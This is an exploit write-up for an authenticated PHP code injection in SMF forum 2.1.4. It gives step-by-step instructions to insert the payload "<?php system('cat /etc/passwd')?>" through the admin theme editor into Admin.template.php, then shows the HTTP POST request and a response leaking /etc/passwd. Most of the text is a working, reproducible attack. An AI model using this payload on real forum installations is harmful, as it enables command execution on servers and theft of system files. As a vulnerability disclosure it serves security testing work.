    # Exploit Title:  Authenticated Code Injection - smfv2.1.4# Date: 8/2024# Exploit Author: Andrey Stoykov# Version: 2.1.4# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.htmlCode Injection Authenticated:Steps to Reproduce:1. Login as admin2. Browse to "Current Theme"3. Click on "Modify Themes" > "SMF Default Theme"4. Click on Admin.template.php5. In the first box enter the PHP payload "<?php system('cat /etc/passwd')?>"// HTTP POST request showing the code injection payloadPOST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7[...]entire_file[]=<?php+system('cat /etc/passwd') ?>[...]// HTTP response showing /etc/passwd contentsHTTP/1.1 200 OKServer: ApachePragma: no-cache[...][...]root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin[...]

Tag

#vulnerability